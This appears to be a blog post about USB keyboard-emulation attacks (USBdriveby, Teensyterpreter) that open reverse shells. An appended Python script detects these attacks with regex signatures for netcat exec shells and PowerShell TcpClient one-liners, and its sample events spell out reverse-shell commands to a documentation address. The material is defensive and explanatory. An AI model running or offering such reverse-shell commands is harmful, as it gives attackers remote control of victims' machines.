How to write signature to detect netcat reverse shell
Computers blindly trust USB devices connected to them. There's no pop-up to confirm a device was plugged in, and no validation of whether the device should be trusted. This lets you do some nefarious things with a simple USB microcontroller. We've recently seen two examples of this: the USBdriveby and the Teensyterpreter. Both devices are based on the Teensy development board. When connected to a computer, they act as a Human Interface Device to emulate a keyboard and mouse.

When connected, USBdriveby changes the DNS server settings to a custom IP, to allow for DNS spoofing of the victim's machine. This is possible without a password through the OS X System Preferences, but it requires emulating both keystrokes and clicks. After modifying DNS, a reverse shell is opened using netcat. AppleScript is used to position the window in a known location, then the buttons can be reliably clicked by code running on the Teensy. This allows for remote code execution on the machine.

The Teensyterpreter gives a reverse shell on Windows machines. It runs command prompt as administrator, then enters a one-liner to fire up the reverse shell using PowerShell. The process happens in under a minute, and works on all Windows versions newer than XP. With a $20 microcontroller board you can quickly fire up remote shells for... "support purposes".

We'd like to see the two projects merge into a single codebase that supports both operating systems. Bonus points if you can do it on our Trinket Pro. Video demos of both projects after the break.

BadUSB is something that everyone is hoping won't be a big deal, but it is. If you can't trust any USB device then you may as well throw the towel in. So your admin only allows USB devices from a certain vendor or device id.
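On the detection side the title asks about, here is an added Python example (not code from Hackaday or from either project) that applies command-line signatures for the two launch styles described above, netcat handed a shell to execute and a PowerShell one-liner opening a TCP client, to process-creation telemetry. The event format (`host=`, `parent=`, `cmd=` fields) and the sample events are constructed for this example; any real feed (auditd, Sysmon, an EDR) would need its own parser.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    name: str
    pattern: re.Pattern


# Command-line signatures for the launch styles the post describes.
# Matching on the full command line rather than the binary name alone keeps
# ordinary netcat use (port checks, file transfers) from firing the rule.
SIGNATURES = (
    # netcat/ncat told to hand a shell to the remote end: -e, -c, --exec, --sh-exec
    Signature(
        "netcat_exec_shell",
        re.compile(
            r"\b(nc|ncat|netcat)\b.*?(\s-[a-z]*[ec]\b|\s--(exec|sh-exec))\s*\S*(sh|cmd|powershell)",
            re.I,
        ),
    ),
    # named-pipe variant used when netcat is built without -e
    Signature(
        "netcat_fifo_shell",
        re.compile(r"\bmkfifo\b.*\|\s*(nc|ncat|netcat)\b", re.I),
    ),
    # PowerShell one-liner opening an outbound TCP client from the command line
    Signature(
        "powershell_tcpclient",
        re.compile(r"\bpowershell(\.exe)?\b.*Net\.Sockets\.TcpClient", re.I),
    ),
)

# Constructed event layout (assumption): key=value fields, command line in quotes.
EVENT_RE = re.compile(
    r'host=(?P<host>\S+).*?parent=(?P<parent>\S+).*?cmd="(?P<cmd>[^"]*)"'
)


def scan_process_events(events):
    """Return one hit dict per (event, signature) match, in event order."""
    hits = []
    for line in events:
        m = EVENT_RE.search(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        for sig in SIGNATURES:
            if sig.pattern.search(m["cmd"]):
                hits.append(
                    {
                        "host": m["host"],
                        "parent": m["parent"],
                        "signature": sig.name,
                        "cmd": m["cmd"],
                    }
                )
    return hits


# Constructed sample telemetry: two launches matching the post's description,
# interleaved with benign netcat and PowerShell use that must not alert.
# 203.0.113.0/24 is documentation address space.
SAMPLE_EVENTS = [
    'ts=2014-12-20T10:01:02Z host=mac01 parent=osascript cmd="nc -e /bin/sh 203.0.113.10 4444"',
    'ts=2014-12-20T10:01:09Z host=mac01 parent=bash cmd="nc -zv mailhost 25"',
    'ts=2014-12-20T10:03:44Z host=win01 parent=cmd.exe cmd="powershell -nop -c $c=New-Object Net.Sockets.TcpClient(\'203.0.113.10\',4444)"',
    'ts=2014-12-20T10:04:10Z host=win01 parent=explorer.exe cmd="powershell -c Get-Process"',
]


if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_EVENTS):
        print(f'{hit["host"]} [{hit["signature"]}] parent={hit["parent"]}: {hit["cmd"]}')
```

The parent process is carried through deliberately: a shell launched under `osascript` or an elevated `cmd.exe` that appeared seconds after a new HID device enumerated is a much stronger signal than the command line alone, and that correlation is where a rule for this class of device should go next.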